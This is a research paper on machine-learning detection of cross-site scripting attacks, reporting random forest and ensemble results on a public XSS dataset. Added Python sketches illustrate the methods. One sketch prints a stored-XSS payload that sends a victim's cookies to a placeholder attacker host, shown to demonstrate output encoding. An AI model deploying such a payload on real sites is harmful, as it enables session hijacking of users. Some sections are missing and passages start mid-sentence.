Information 15 00420
Article
Machine Learning-Driven Detection of Cross-Site Scripting Attacks
Rahmah Alhamyani * and Majid Alshammari *
College of Computer and Information Technology, Taif University, Taif 26571, Saudi Arabia
* Correspondence: rahooma88@hotmail.com (R.A.); m.alshammari@tu.edu.sa (M.A.)
Keywords: cross-site scripting attacks; machine learning; deep learning; artificial neural networks;
web security; web vulnerabilities; attack detection; feature selection
Figure 1. Vulnerability statistics report 2023 by EdgeScan.
Web application security focuses on identifying and addressing security vulnerabilities
at the web application level, along with implementing effective solutions for these
flaws [10]. Web security is essential for businesses because websites and web servers are
vulnerable to internal and external threats. Strict policy measures must be implemented to
avoid manipulation or unwanted access to sensitive data or destruction, which could harm
the company's operations or reputation. Online security principles include authentication,
authorization, auditing, and logging [11]. Security is essential for a secure web application.
State integrity refers to maintaining the application's state, which should be kept
untampered; logic correctness means that the logic of the application should be precisely
corrected as intended by the developers; input validity means that user input is verified
before it is used; and security misconfiguration refers to configuration settings and using
secure components. For online applications to guarantee the authenticity and responsiveness
of user inputs, input validation is essential. Both client-side and server-side inputs, such
as HTML5, post message invocations, POST method, database queries, and HTTP request
query strings, should be subject to validation [5].
XSS represents a pervasive threat in the realm of cybersecurity, characterized as a
client-side code injection attack that exploits vulnerabilities in both client-side and
server-side components of web applications [12]. In such attacks, attackers leverage
resources from third-party websites to launch scripts within the victim's browser
environment. Typically, attackers directly insert payloads containing JavaScript (JS) into
the database of a targeted website. Subsequently, when a user requests a page from the
compromised website, the malicious script-containing page is delivered to the victim's
browser, wherein the attacker's payload is executed as part of the Hypertext Markup
Language (HTML) body. This method allows attackers to manipulate user interactions, steal
sensitive information, or compromise the integrity of web applications [8]. Furthermore,
attackers exploit vulnerabilities that are publicly disclosed before patches are developed
and deployed, enabling unauthorized access to systems and the unauthorized alteration or
theft of data [13]. Figure 2 illustrates the general XSS attacks.
By inserting additional HTML or client script code into a website or input form,
attackers can compromise the security of users' browsers, gaining unauthorized access to
sensitive data such as cookies, session tokens, etc. [12,14]. This malicious script, capable of
rewriting HTML text, enables attackers to compromise user security, extract sensitive data,
or even deploy harmful software [15].
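To make the injection mechanism concrete, the following minimal Python sketch (not taken from the paper) shows how a stored payload ends up inside the HTML body when user input is interpolated without encoding, and how output encoding neutralizes it. The `render_comment` helper, the sample payload, and the `attacker.example` host are hypothetical; `html.escape` is part of the Python standard library.

```python
import html

def render_comment(comment: str, escape: bool) -> str:
    """Build an HTML fragment from a stored user comment (hypothetical helper)."""
    body = html.escape(comment) if escape else comment
    return f'<div class="comment">{body}</div>'

# Illustrative payload that an attacker might store in the site's database.
payload = (
    "<script>document.location="
    "'https://attacker.example/?c='+document.cookie</script>"
)

unsafe_page = render_comment(payload, escape=False)
safe_page = render_comment(payload, escape=True)

print(unsafe_page)  # the <script> element would reach the browser intact
print(safe_page)    # angle brackets and quotes are turned into HTML entities
```

Output encoding of this kind is a prevention measure; the detection models studied in this paper instead classify requests or pages as benign or malicious.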
Figure 3 illustrates the two primary types of XSS vulnerabilities [15,16]:
Client-side (Document Object Model (DOM)-based XSS);
Server-side (persistent and non-persistent XSS).
Information 2024, 15, 420 3 of 20
Figure 2. The depiction of the general XSS attack scenario.
(URLs) containing unfiltered text that executes upon user interaction. The repercussions of
successful XSS payloads include cookie theft, keylogging, session hijacking, and identity
theft [16].
Despite the widespread adoption of standardized code development practices, over
60% of websites remain vulnerable to XSS attacks, highlighting the critical need for robust
detection and prevention mechanisms [20]. Identifying and thwarting XSS attacks are
paramount for safeguarding web applications and protecting sensitive user data. To this
end, various analysis techniques have been employed, including static analysis, dynamic
analysis, and machine learning (ML). Static analysis involves scrutinizing the source code
to detect vulnerabilities, offering assurances regarding specific vulnerability absence but
potentially requiring extensive time and yielding limited results [21]. Conversely, dy-
namic analysis focuses on understanding script behavior during execution, facilitating the
identification of unknown vulnerabilities and novel attack types that static analysis may
overlook [21].
Traditional methods for XSS detection often suffer from high false-positive (FP) rates,
meaning that they flag harmless activity as malicious. Additionally, these methods may
struggle to adapt to new attack vectors employed by cybercriminals. ML, on the other
hand, leverages existing script data to create classifiers and predict the behavior of new
scripts, offering the rapid identification of malicious scenarios, adaptability to evolving
attack types, and the ability to operate across diverse application environments without
the need for a dedicated analysis environment [21].
The integration of ML into XSS detection frameworks holds significant promise,
enabling enhanced threat detection capabilities and proactive defense measures against
evolving cyber threats. This paper explores the effectiveness and benefits of ML-based
XSS detection methods, highlighting their potential to bolster web application security and
mitigate the risk of XSS attacks.
This research has several key objectives:
1. Create an ML-based model: We provide an ML model that greatly enhances the
precision and potency of XSS detection in web applications.
2. Identify ideal features: To guarantee the accurate detection of XSS attacks while
reducing false alarms, we seek to identify the best features and data sources for ML
model training.
3. Assess the efficacy of ML-based detection systems: We will evaluate the ML-based
approach’s accuracy, efficiency, and reliability by comparing it with state-of-the-art
detection techniques.
4. Examine current methods: We briefly summarize current ML and deep learning
(DL) algorithms that have been applied to XSS detection.
This research addresses these challenges by proposing a novel ML-based system
for XSS attack detection. Our aim is to enhance web application security by developing
a more accurate, robust, and adaptable detection system. By reducing the number of
FPs and effectively identifying XSS attacks, this research contributes significantly to the
improvement in web application security practices.
We develop and assess the effectiveness of ML-based methods, including Decision
Trees (DTs), Support Vector Machines (SVMs), Random Forest (RF), Logistic Regression
(LR), Extreme Gradient Boosting (XGBoost), Multi-Layer Perceptron (MLP), Convolutional
Neural Networks (CNNs), Artificial Neural Networks (ANNs), and ensemble learning
with feature selection techniques such as Information Gain (IG) and Analysis of Variance
(ANOVA) to identify the most relevant features and enhance the accuracy and efficiency of
identifying XSS in web applications. The experiment is conducted using the XSS dataset
that was published by Mokbal et al. [22]. We selected the top 25 features using IG as a
feature selection technique to choose the most informative features.
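As an illustration of IG-based ranking, the sketch below computes the information gain of each feature with respect to the class label and keeps the k highest-scoring features. It is a standard-library sketch under stated assumptions, not the authors' implementation: the feature names and toy rows are hypothetical, the features are treated as discrete, and k = 2 is used only so the toy example stays small (the paper selects the top 25). Continuous features would first need discretization or an estimator such as scikit-learn's `mutual_info_classif`.

```python
from collections import Counter
from math import log2

def entropy(labels):
    """Shannon entropy (in bits) of a sequence of class labels."""
    n = len(labels)
    return -sum((c / n) * log2(c / n) for c in Counter(labels).values())

def information_gain(column, labels):
    """IG(Y; X) = H(Y) - sum_v P(X=v) * H(Y | X=v) for a discrete feature."""
    n = len(labels)
    groups = {}
    for value, label in zip(column, labels):
        groups.setdefault(value, []).append(label)
    conditional = sum(len(g) / n * entropy(g) for g in groups.values())
    return entropy(labels) - conditional

def top_k_features(rows, labels, names, k):
    """Score every feature by information gain and return the k best names."""
    scores = {
        name: information_gain([row[i] for row in rows], labels)
        for i, name in enumerate(names)
    }
    ranked = sorted(names, key=lambda name: scores[name], reverse=True)
    return ranked[:k], scores

# Toy data with hypothetical binary features; label 1 = XSS, 0 = benign.
names = ["has_script_tag", "has_onerror", "url_is_long"]
rows = [(1, 1, 0), (1, 0, 1), (1, 1, 1), (0, 0, 0), (0, 0, 1), (0, 0, 0)]
labels = [1, 1, 1, 0, 0, 0]

selected, scores = top_k_features(rows, labels, names, k=2)
print(selected)
```

In this toy data `has_script_tag` separates the classes perfectly, so it receives the full 1 bit of gain, while `url_is_long` is nearly uninformative and is dropped.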
After a comparative analysis of the ten models' performance, the RF model, the ensemble
of RF and DTs with Gradient Boost (GB), and the ensemble of RF with MLP scored
99.78%, 99.76%, and 99.65% in accuracy, respectively, and achieved high results in the
other evaluation metrics. The proposed models provide significant performance
improvements compared to existing state-of-the-art methods, as they can detect XSS-based
attacks while simultaneously minimizing FP and false-negative (FN) rates. Moreover,
the proposed method is compared with other existing state-of-the-art XSS attack
detection methods.
The remainder of this paper is organized as follows. Section 2 presents different
methods for XSS attack detection, followed by the proposed research methodology in
Section 3. Sections 4 and 5 present the results and discussion, respectively. Finally, Section 6
contains the conclusion.
2. Related Work
ML approaches have emerged as a promising avenue for XSS attack detection in web
applications. Their ability to learn from data and adapt to evolving attack patterns offers
significant advantages over traditional methods [23]. However, selecting the most effective
preprocessing techniques is crucial to optimize detection performance [23].
Several studies have explored various ML algorithms for XSS detection. Banerjee
et al. [24] implemented ML algorithms for identifying XSS threats. These algorithms include
SVMs, K-Nearest Neighbors (KNN), RF, and LR. The LR model was utilized to map the true and false values
included in the dataset. The implementation of the suggested model used a dataset with
24 attributes based on JS and URL features. Among these, 1453 samples were benign,
while 158 were flagged as malicious. They achieved the highest accuracy of 98% for the RF
classifier. Similarly, Habibi and Surantha [12] proposed a method to enhance XSS attack
detection performance by using different ML techniques with an n-gram approach to script
features. These techniques include SVMs, KNN, and Naive Bayes (NB). The results demonstrate
that combining SVMs with the n-gram method yielded the highest accuracy, 98%.
Kascheev and Olenchikova [21] compared various ML algorithms,
including SVM, DT, NB, and LR classifiers, with DTs achieving the highest accuracy of
98.81%. While these studies demonstrate the effectiveness of ML, they also highlight the
importance of feature selection, as evidenced by the lower performance of LR in Kascheev
and Olenchikova’s work [21].
Gogoi et al. [25] proposed a hybrid approach combining traditional Web Application
Firewalls with ML algorithms like SVMs. Their focus on reducing FPs and FNs while
maintaining high precision yielded promising results of 98%. They discovered that SVMs
successfully distinguished inputs from XSS attacks and legitimate web applications with a
balance between precision and accuracy. Mokbal et al. [22] introduced the XGBXSS frame-
work, utilizing XGBoost and a hybrid feature selection technique consisting of sequential
backward selection (SBS) combined with Information Gain (IG) to choose an optimal subset
while lowering computing expenses and preserving the good performance of the detec-
tor. Also, the study’s dataset included 138,569 samples, with 100,000 samples classified
as benign. This ensemble learning approach achieved exceptional performance with an
accuracy of 99.59%, precision of 99.53%, and a low FP rate of 0.18%.
Research on hybrid models for XSS detection is also gaining traction. Stiawan et al. [26]
combined Long Short-Term Memory (LSTM) with Principal Component Analysis (PCA)
for dimensionality reduction, achieving 96.85% accuracy. Other studies explored combina-
tions of LSTM and CNNs [27] or CNNs and scanners [28] to achieve high accuracy rates
exceeding 99%. Melicher et al. [29] proposed a method integrating three-layer Deep Neural
Networks (DNN) with taint tracking for DOM XSS detection, achieving 95% accuracy
but a precision of only 26.7%. Alaoui et al. [30] utilized an LSTM
Encoder–Decoder with word embeddings including tools like word2vec, FastText, and
Glove for XSS attack detection, reaching a precision of 99.09% and recall and accuracy of
99.08% each.
Gupta et al. [31] presented GeneMiner, a system for detecting novel XSS attacks. It
consists of GeneMiner-E for extracting new features and GeneMiner-C for classifying input
payloads as either malicious or benign. GeneMiner responds to changing patterns of attack
payloads to detect adversarial XSS attacks. They evaluate their classification accuracy by
comparing it with NB, RF, LR, SVMs, AdaBoost, MLP, CNNs, and reinforcement learning.
Their approach achieved an accuracy of 98.5% in identifying newly crafted malicious
payloads. Dawadi et al. [32] conducted a comparative analysis using LSTMs for Distributed
Denial of Service (DDoS), XSS, and SQL injection detection, achieving an accuracy of 89.34%
for XSS attacks within their layered architecture model.
The relevance of XSS attack detection extends beyond web applications to Internet
of Things (IoT) devices and cloud-based services. Tian et al. [33] proposed a CNN-based
method for edge devices that can be used with cloud-based web applications. The suggested
model used the Continuous Bag of Words (CBOW) model to vectorize URLs during
the data preparation phase. The Rectified Linear Unit (ReLU) function, dropout layers, and
pooling layers are used in the CNN architecture to optimize the CNN model, achieving an
accuracy of 99.41%. Chaudhary et al. [34] introduced a CNN-based approach for identifying
XSS attacks. The suggested approach applies CNNs after two stages of data preparation,
specifically decoding and contextual tagging. Their work has been implemented in Fog
nodes connected with IoT networks, achieving an accuracy of 99.88%. Luo et al. [35] pro-
posed an Ensemble DL-Based Web Attack Detection System (EDL-WADS) for online attack
detection in IoT networks. The suggested model examined URL requests for abnormalities,
and it used a combination of three DL-based models, namely Multimodal Residual Net-
works (MRNs), CNNs, and LSTM, achieving 98% accuracy. Finally, Odun-Ayo et al. [36]
explored MLP for real-time XSS detection in cloud-based web applications, achieving an
accuracy of 99.47%.
Furthermore, several recent studies have introduced novel approaches to detecting
XSS attacks, leveraging advanced techniques such as attention mechanisms, generative
adversarial networks (GANs), and Monte Carlo Tree Search (MCTS) algorithms to enhance
detection accuracy and robustness. For instance, [37] proposed the LSTM-attention detec-
tion model, integrating an attention mechanism into the LSTM recurrent neural network
(RNN) architecture. Achieving remarkable precision and recall rates of 99.3% and 98.2%,
respectively, their method demonstrated superior performance in identifying XSS attacks by
enhancing the recognition of malicious codes and feature extraction. In a similar vein, [38]
introduced the Paths Attention Method (PATS) for detecting reflected XSS vulnerabilities,
utilizing syntactic pathways and attention processes to improve training effectiveness.
PATS achieved an accuracy rate of 90.25% and an F1-Score of 81.62% while also addressing
dataset limitations through the creation of a reliable dataset consisting of 10,000 benign
samples from GitHub and 1000 malicious samples from the National Institute of Standards
and Technology (NIST). Additionally, [39] employed the MCTS algorithm and GANs to
generate adversarial XSS attacks, enhancing the detection rate of adversarial examples.
Their method significantly improved the detector’s performance by increasing the rate
of discovering adversarial samples. Meanwhile, [40] emphasized the susceptibility of DL
models to adversarial attacks and proposed a GAN-based approach to automatically gener-
ate hostile XSS attacks against an LSTM-based XSS attack detection model. It demonstrated
a significant decline in the detection model’s performance when tested on modified XSS
instances produced by the GAN model and achieved an accuracy of 98%.
Tariq et al. [41] introduced a hybrid methodology combining genetic algorithms, statis-
tical inference, and reinforcement learning (RL) to assess the proximity of each payload to
malicious and benign samples, offering a novel approach by merging ML with metaheuris-
tic algorithms like the genetic algorithm, achieving an accuracy of 99.89%. Thajeel et al. [42]
addressed the evolving nature of XSS attacks and feature drift using a deep Q-network
multi-agent framework (DQN-MAFS) for dynamic feature selection, achieving an accuracy
of 98.37%. Their proposed approach, called fair agent reward distribution-based dynamic
feature selection (FARD-DFS), outperformed existing methods in terms of accuracy and
F1 measure, providing real-time updates and correction of embedded knowledge without
the need for offline retraining.
These studies showcase the effectiveness of various ML and DL approaches for XSS
attack detection. They highlight the importance of feature selection, ensemble learning
techniques, and the exploration of novel architectures like CNNs and LSTMs for achieving
high accuracy and adapting to evolving attack vectors. However, challenges such as the
lack of standardized datasets, adaptation to emerging attack vectors, and reducing FP rates
persist, indicating the need for further research in this field. Our research builds upon this
foundation by proposing a novel ML-based model that leverages these insights to further
enhance XSS attack detection performance.
3. Research Methodology
This section outlines the methodology employed in conducting research on XSS attack
detection utilizing ML techniques and comparison to other state-of-the-art methods. The
methodology encompasses data collection, preprocessing, feature selection, model training,
and evaluation. Figure 4 illustrates the proposed models' framework.
3.2. Preprocessing
Before training the models, the dataset undergoes preprocessing to ensure uniformity
and relevance. This step involves cleaning the data, handling missing values and class
imbalance, and standardizing formats. We handled the class imbalance by upsampling the
minority class, that is, increasing the number of minority-class samples until it balances
the majority class. Dropping duplicates streamlines the XSS dataset and readies it for
subsequent processing steps, including train–test splitting. Furthermore, we applied
standard scaling (the standard scaler technique in Python) for feature scaling. Finally,
challenges such as the presence of irrelevant features are addressed through feature
selection techniques.
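The preprocessing steps described above can be sketched with the Python standard library alone. This is an illustrative sketch rather than the authors' code: the function names and the toy rows are hypothetical, the upsampling assumes exactly two classes, and the scaling is the z-score transform with the population standard deviation (the same transform that scikit-learn's `StandardScaler` applies).

```python
import random
from statistics import mean, pstdev

def drop_duplicates(rows):
    """Remove exact duplicate (features, label) rows, keeping first occurrences."""
    return list(dict.fromkeys(rows))

def upsample_minority(rows, seed=0):
    """Resample the minority class with replacement until the classes match.

    Assumes a binary problem, i.e. exactly two distinct labels in `rows`.
    """
    rng = random.Random(seed)
    by_label = {}
    for features, label in rows:
        by_label.setdefault(label, []).append((features, label))
    minority, majority = sorted(by_label.values(), key=len)
    extra = rng.choices(minority, k=len(majority) - len(minority))
    return majority + minority + extra

def standardize(rows):
    """Z-score each feature column: (x - mean) / population standard deviation."""
    columns = list(zip(*(features for features, _ in rows)))
    # Fall back to 1.0 for constant columns to avoid division by zero.
    stats = [(mean(col), pstdev(col) or 1.0) for col in columns]
    return [
        (tuple((x - m) / s for x, (m, s) in zip(features, stats)), label)
        for features, label in rows
    ]

# Toy rows: ((feature_1, feature_2), label) with label 1 = malicious.
data = [
    ((1.0, 10.0), 0), ((1.0, 10.0), 0), ((2.0, 20.0), 0),
    ((3.0, 30.0), 0), ((9.0, 90.0), 1),
]
clean = drop_duplicates(data)        # one duplicate benign row removed
balanced = upsample_minority(clean)  # malicious rows resampled to match benign
scaled = standardize(balanced)
print(len(clean), len(balanced))
```

A common precaution is to upsample and to fit the scaling statistics on the training split only, so that copies of minority samples and test-set statistics do not leak across the split; the text here does not state which order was used.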
3.5. Evaluation
The performance of each trained model is evaluated to determine its effectiveness in
detecting XSS attacks. Evaluation metrics such as accuracy, precision, recall, F1-Score, Re-
ceiver Operating Characteristic—Area Under the Curve (ROC-AUC) score, and confusion
matrix are used to assess the models’ performance [23]. The evaluation process provides
insights into the strengths and weaknesses of each model, guiding the selection of the most
suitable approach for XSS attack detection.
3.5.1. Accuracy
Accuracy is a metric for assessing the potency of a classification model. It shows the
proportion of accurately classified samples out of all the samples that have been classified,
as shown in Equation (1).
\[ \mathrm{Acc} = \frac{TP + TN}{TP + TN + FP + FN} \tag{1} \]
3.5.2. Precision
Precision serves as a metric for assessing the reliability of a model's positive
predictions. It is the ratio of correctly predicted positive samples (TP) to the total
number of samples predicted as positive, as shown in Equation (2).
\[ \mathrm{Precision} = \frac{TP}{TP + FP} \tag{2} \]
3.5.3. Recall
Recall is a metric that assesses the ability of a model to identify positive samples. It
is the number of correctly predicted positive samples (TP) divided by the total number of
samples that actually belong to the positive class, so it decreases as the number of FNs
grows, as shown in Equation (3).
\[ \mathrm{Recall} = \frac{TP}{TP + FN} \tag{3} \]
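Equations (1)–(3) can be computed directly from the four confusion-matrix counts. The sketch below is a minimal standard-library illustration; the label vectors are made-up toy values, not results from the paper, and label 1 is assumed to denote the malicious (positive) class.

```python
def confusion_counts(y_true, y_pred, positive=1):
    """Return (TP, TN, FP, FN) for a binary classification task."""
    tp = sum(t == positive and p == positive for t, p in zip(y_true, y_pred))
    tn = sum(t != positive and p != positive for t, p in zip(y_true, y_pred))
    fp = sum(t != positive and p == positive for t, p in zip(y_true, y_pred))
    fn = sum(t == positive and p != positive for t, p in zip(y_true, y_pred))
    return tp, tn, fp, fn

def accuracy(tp, tn, fp, fn):
    """Equation (1): share of all samples that were classified correctly."""
    return (tp + tn) / (tp + tn + fp + fn)

def precision(tp, fp):
    """Equation (2): share of predicted positives that are truly positive."""
    return tp / (tp + fp) if (tp + fp) else 0.0

def recall(tp, fn):
    """Equation (3): share of actual positives that the model found."""
    return tp / (tp + fn) if (tp + fn) else 0.0

# Toy labels (1 = malicious, 0 = benign); purely illustrative.
y_true = [1, 1, 1, 0, 0, 0, 0, 1]
y_pred = [1, 1, 0, 0, 0, 1, 0, 1]

tp, tn, fp, fn = confusion_counts(y_true, y_pred)
print(tp, tn, fp, fn)
print(accuracy(tp, tn, fp, fn), precision(tp, fp), recall(tp, fn))
```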
3.5.4. F1-Score
The F1 measure is the harmonic mean of precision and recall; it considers both metrics
and provides a balanced evaluation of performance. This assessment metric is commonly
used when datasets are imbalanced, meaning that one class has a much higher number of
occurrences than the other. Equation (4) gives the general weighted form, where P is
precision, R is recall, and α weights the two; α = 0.5 yields the F1-Score.
\[ \text{F1-score} = \frac{1}{\alpha \cdot \frac{1}{P} + (1 - \alpha) \cdot \frac{1}{R}} \tag{4} \]
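The weighted harmonic mean in Equation (4), 1 / (α/P + (1 − α)/R), reduces to the familiar 2PR / (P + R) when α = 0.5. The short sketch below checks this numerically. The function name `f_measure` is hypothetical; the inputs are the rounded RF precision and recall reported in Table 4 (99.80% and 99.75%).

```python
def f_measure(precision, recall, alpha=0.5):
    """Weighted harmonic mean of precision and recall (Equation (4))."""
    if precision == 0 or recall == 0:
        return 0.0  # the harmonic mean is zero when either term is zero
    return 1.0 / (alpha / precision + (1.0 - alpha) / recall)

# Rounded RF values from Table 4, expressed as fractions.
p, r = 0.9980, 0.9975

f1 = f_measure(p, r)                # alpha = 0.5 gives the F1-Score
f1_closed_form = 2 * p * r / (p + r)
print(round(f1, 4))
```

The result is approximately 0.9977, in line with the 99.78% F1-Score reported for RF given that the inputs are themselves rounded.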
3.5.5. ROC-AUC
ROC-AUC is a popular metric in ML for assessing the performance of binary
classification models. It is the area under the ROC curve, which plots the true-positive
rate against the false-positive rate across classification thresholds. The ROC-AUC score
ranges from 0 to 1, with 1 representing perfect classification and 0.5 indicating random
guessing. A score higher than 0.5 indicates that the model outperforms random guessing.
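One way to see what the ROC-AUC score measures is its rank interpretation: it equals the probability that a randomly chosen positive sample receives a higher score than a randomly chosen negative one, with ties counted as one half. The sketch below implements that definition with the standard library; it is an illustration with made-up scores, not the evaluation code used in the paper, and its quadratic pairwise loop is only suitable for small inputs.

```python
def roc_auc(y_true, scores):
    """ROC-AUC as the fraction of (positive, negative) pairs ranked correctly."""
    pos = [s for t, s in zip(y_true, scores) if t == 1]
    neg = [s for t, s in zip(y_true, scores) if t == 0]
    if not pos or not neg:
        raise ValueError("ROC-AUC needs at least one sample of each class")
    # A pair counts 1 if the positive scores higher, 0.5 on a tie, else 0.
    wins = sum((p > n) + 0.5 * (p == n) for p in pos for n in neg)
    return wins / (len(pos) * len(neg))

# Toy labels and classifier scores (illustrative only).
y_true = [0, 0, 1, 1]
scores = [0.1, 0.4, 0.35, 0.8]

auc = roc_auc(y_true, scores)
print(auc)
```

Here three of the four positive-negative pairs are ordered correctly, so the score is 0.75; identical scores for every sample would give 0.5, matching the random-guessing baseline.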
As XSS attacks evolve in complexity with advancements in web applications, this
research acknowledges the challenges posed by obfuscation techniques and semantic
reasoning in attack statements. The methodology is designed to address these challenges
by employing robust preprocessing, feature selection, and model training techniques to
enhance the detection of XSS vulnerabilities in web applications.
4. Results
The experimental results, as depicted in Table 3, underscore the efficacy of employing
diverse ML approaches in XSS attack detection, signifying a significant advancement in
web security measures. Moreover, the proposed method is benchmarked against existing
state-of-the-art XSS attack detection methods, offering a comparative analysis to gauge its
performance and efficacy.
All experiments were meticulously conducted within the Google Colab environment,
ensuring consistency and reproducibility in training and testing the models. In the sub-
sequent sections, a detailed exploration of the empirical findings unfolds, shedding light
on various aspects, including model performance, feature importance, computational
efficiency, and broader implications for bolstering web security against XSS vulnerabilities.
Through this comprehensive analysis, valuable insights are gleaned, paving the way
for the development of enhanced detection mechanisms and resilient defense strategies
in the dynamic landscape of web security. We applied various ML models, outlined in
the following.
indicative of the model’s ability to distinguish between classes, stood at 97%, highlighting
its robustness in discriminating between benign and malicious instances. The confusion ma-
trix provides additional insights into the LR classifier’s performance, revealing a minimal
misclassification rate of 0.22% for benign instances and 5.68% for malicious instances.
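Per-class misclassification rates of the kind quoted above are read off the rows of the confusion matrix: the benign rate is FP / (TN + FP) and the malicious rate is FN / (TP + FN). The sketch below shows the calculation; the counts are hypothetical round numbers chosen for readability and are not the paper's confusion matrix.

```python
def per_class_error_rates(tn, fp, fn, tp):
    """Return (benign_error, malicious_error) as fractions of each true class."""
    benign_error = fp / (tn + fp)     # benign samples flagged as malicious
    malicious_error = fn / (tp + fn)  # malicious samples that were missed
    return benign_error, malicious_error

# Hypothetical confusion-matrix counts, for illustration only.
tn, fp, fn, tp = 90, 10, 5, 95

benign_error, malicious_error = per_class_error_rates(tn, fp, fn, tp)
print(f"benign: {benign_error:.2%}, malicious: {malicious_error:.2%}")
```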
5. Discussion
In summary, the comprehensive evaluation of all the proposed models in our research,
as depicted in Figures 5 and 6, underscores the effectiveness of various ML techniques for
XSS attack detection. Among these models, the RF model emerges as the top-performing
one, exhibiting the highest accuracy and balanced performance across all evaluation metrics.
Nevertheless, other models such as XGBoost also demonstrate competitive performance,
showcasing the versatility and efficacy of diverse ML approaches in addressing XSS vul-
nerabilities. The ensemble models, combining multiple classifiers, further accentuate the
potential benefits of leveraging ensemble techniques to enhance predictive performance.
These findings offer valuable insights for both researchers and practitioners in the
cybersecurity domain, guiding the development of more robust and effective XSS detection
systems to bolster web security measures and mitigate cyber threats effectively.
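As a rough illustration of how an ensemble can combine multiple classifiers, the sketch below applies soft voting: each model outputs a probability that a sample is malicious, the probabilities are averaged (optionally with weights), and the mean is thresholded. Soft voting is an assumption made for this example, since the combination rule is not specified in this passage, and the probability values are made up rather than produced by trained RF or MLP models.

```python
def soft_vote(prob_lists, weights=None, threshold=0.5):
    """Average per-model P(malicious) for each sample and threshold the mean."""
    n_models = len(prob_lists)
    weights = weights or [1.0] * n_models
    total = sum(weights)
    averaged = [
        sum(w * p for w, p in zip(weights, sample_probs)) / total
        for sample_probs in zip(*prob_lists)
    ]
    return [int(p >= threshold) for p in averaged], averaged

# Hypothetical per-sample probabilities from two already-trained models.
rf_probs = [0.92, 0.40, 0.10, 0.55]
mlp_probs = [0.80, 0.70, 0.20, 0.35]

predictions, averaged = soft_vote([rf_probs, mlp_probs])
print(predictions)
```

On the second and fourth samples the two models disagree, and the averaged probability decides the final label, which is how an ensemble can smooth over the errors of an individual model.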
Figure 6. Confusion matrix of the proposed models.
167 features and exhibited lower performance compared to ours, suggesting potential
limitations in their approach or dataset. Additionally, they re-implemented a combination
of genetic algorithm, statistical inference, and RL introduced by Tariq et al. [41] for XSS
attack detection.
Our experimental results, as depicted in Table 4 and Figure 7, demonstrate that our
proposed methods, along with the method presented by Mokbal et al. [22], achieved the
highest accuracy and precision rates. Furthermore, our proposed methods, including RF,
ensemble learning models RF and GB with DTs, and MLP with RF, as well as the method
from Tariq et al. [41], attained the best recall rates, ranging from 99.54% to 99.77%. These
results signify the robustness and effectiveness of our proposed methods in detecting XSS
attacks. Among the three proposed models, RF achieved exceptional results in terms of
accuracy, precision, and F1-Score; however, in terms of recall, the ensemble learning models
RF and GB with DTs achieved higher results. In general, the three proposed models yielded
higher results in all evaluation metrics than the existing studies.
Table 4. Results comparison with state-of-the-art methods.

| Author | Algorithms | Feature Selection Method | No. of Selected Features | Accuracy (%) | Precision (%) | Recall (%) | F1-Score (%) |
|---|---|---|---|---|---|---|---|
| Mokbal et al. [22] (2021) | XGBoost | Hybrid (IG and SBS) | 30 | 99.59 | 99.50 | 99.01 | 99.27 |
| Thajeel et al. [42] (2023) | DTs | Dynamic | 167 | 98.81 | 98.16 | 97.70 | 97.84 |
| Tariq et al. [41,42] (2023) | Genetic algorithm, statistical inference, and reinforcement learning | - | 167 | 95.38 | 95.93 | 99.54 | 95.20 |
| Our proposed models | RF | IG | 25 | 99.78 | 99.80 | 99.75 | 99.78 |
| Our proposed models | DT and RF with GB | IG | 25 | 99.76 | 99.74 | 99.77 | 99.76 |
| Our proposed models | MLP with RF | IG | 25 | 99.65 | 99.59 | 99.71 | 99.65 |

Overall, our findings underscore the advancements made in XSS attack detection
through ML techniques, emphasizing the importance of algorithm selection and feature
engineering in developing accurate and robust detection models. By achieving superior
performance compared to existing methods, our research contributes significantly to enhancing
web security measures and mitigating cyber threats effectively.
6. Conclusions
In conclusion, the escalating complexity of XSS attacks underscores the urgency for
robust detection mechanisms. As attackers increasingly employ obfuscation techniques
to evade detection, traditional methods struggle to keep pace. However, leveraging ML
proves to be a potent strategy in combating this evolving threat landscape. ML models
offer a more resilient and dynamic protection against malicious code injections because
they can learn from enormous volumes of data, adjust to changing attack patterns, and
generalize to uncommon circumstances.
This research proposes a unique framework model for XSS attack detection using a
comprehensive suite of ML algorithms. Our experimentation encompassed DTs, SVMs, RF,
LR, XGBoost, MLP, CNNs, ANNs, and ensemble learning techniques. Through rigorous
evaluation of a dataset of recent real-world traffic, augmented by feature selection methods
like IG and ANOVA, we identified the most effective models.
Among the ten models examined, the RF model emerged as the top performer, achiev-
ing an accuracy score of 99.78%. Additionally, ensemble models combining RF with DTs
and GB, as well as ensemble models integrating RF with MLP, demonstrated high accuracy
scores of 99.76% and 99.65%, respectively, alongside robust performance across various
evaluation criteria. Notably, these proposed models outperformed previous state-of-the-art
methods, effectively detecting XSS-based attacks while minimizing FPs and FNs.
Looking ahead, our future work will focus on further enhancing these top-performing
models to detect other types of web application attacks, such as SQL injection. By con-
tinuing to innovate and refine our approach, we aim to fortify web security measures
and stay ahead of emerging cyber threats in an ever-evolving digital landscape. We also
plan to train and evaluate the ML models on a large-scale dataset, which we expect to
reduce FPs further and improve real-time monitoring. Because the models are adaptable
and make efficient use of resources, they may be incorporated into broader security
policies. Overall, the ML models are a step forward in safeguarding sensitive data and web
applications from XSS attacks and, with the planned extensions, from SQL injection and
other online threats.
Author Contributions: Conceptualization, R.A. and M.A.; methodology, R.A. and M.A.; formal
analysis, R.A. and M.A.; investigation, R.A. and M.A.; writing—original draft, R.A.; visualization,
R.A.; supervision, M.A.; funding acquisition, M.A. All authors have read and agreed to the published
version of the manuscript.
Funding: The authors extend their appreciation to Taif University, Saudi Arabia, for supporting this
work through project number (TU-DSPP-2024-286).
Data Availability Statement: This work utilizes the freely accessible XSS dataset that can be found
in [22].
Acknowledgments: The authors extend their appreciation to Taif University, Saudi Arabia, for
supporting this work through project number (TU-DSPP-2024-286).
Conflicts of Interest: The authors declare no conflicts of interest.
References
1. Sotnik, S.; Shakurova, T.; Lyashenko, V. Development Features Web-Applications. 2023. Available online: www.ijeais.org/ijaar
(accessed on 13 June 2024).
2. Prasetio, D.A.; Kusrini, K.; Arief, M.R. Cross-site Scripting Attack Detection Using Machine Learning with Hybrid Features. J.
Infotel 2021, 13, 1–6. [CrossRef]
3. Bielova, N. Survey on JavaScript security policies and their enforcement mechanisms in a web browser. J. Log. Algebr. Program.
2013, 82, 243–262. [CrossRef]
4. Dasgupta, D.; Akhtar, Z.; Sen, S. Machine learning in cybersecurity: A comprehensive survey. J. Def. Model. Simul. 2022, 19,
57–106. [CrossRef]
5. Chaudhari, G.R.; Vaidya, M.V. A Survey on Security and Vulnerabilities of Web Application. 2014. Available online:
www.ijcsit.com (accessed on 13 June 2024).
